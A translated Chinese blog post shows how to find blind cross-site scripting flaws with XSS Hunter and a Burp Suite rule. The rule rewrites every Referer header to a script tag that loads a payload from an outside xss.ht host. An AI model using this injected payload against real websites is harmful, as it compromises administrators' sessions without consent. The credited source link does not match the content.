找到盲XSS漏洞的简单方法

Track-SSG   ·   发表于 2019-03-14 11:02:12   ·   漏洞文章

22.png

这篇文章中我将分享一个我在某网站上发现的盲XSS。同时,我会向大家推荐一种新的盲XSS的工具。

盲XSS是跨站脚本的一种(XSS),攻击者“盲目地”在网页中输入一系列XSS的payload,希望能保存到数据库或文件中,攻击后端管理者。

33.png

目前,我使用XSS hunter(网页版)来寻找找出盲XSS。

XSShunter:

XSS Hunter是最近才推出的平台,提供大量的payload,同时可以监控和管理XSS的反馈。通过它,你可以发动各种XSS攻击,配合burpsuite能进行大规模盲XSS攻击。

攻击步骤

第1步:要在burpsuite创建新规则,因为没有任何预定义的规则,单击“添加”,就可以看到一个新规则对话框。单击“类型”的下拉列表,选择“Request header”。

然后,添加^Referer.*$作为“匹配”条件。这里使用了正则表达式,作用是匹配任何以Referer开头的字符串。在HTTP请求中,一般存在一个Referer请求头。

接下来,将“替换”文本设置为Referer: “><sc ript src=https://newone.xss.ht></sc ript>。然后,选中“正则表达式匹配”复选框,最后单击“确定”。

44.png

第2步:通过burpsuite拦截,你可以在“原始”请求中看到,Referer: “><sc ript src=https://newone.xss.ht></sc ript>已被替换上去!

55.png

第3步:几个小时后,当我再次登录XXS SHunter时,我已经获得了一个盲XSS。

66.png

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://www.vulnano.com/2019/03/facebook-messenger-server-random-memory.html
           


打赏我,让我更有动力~

0 条回复   |  直到 2019-3-14 | 1217 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.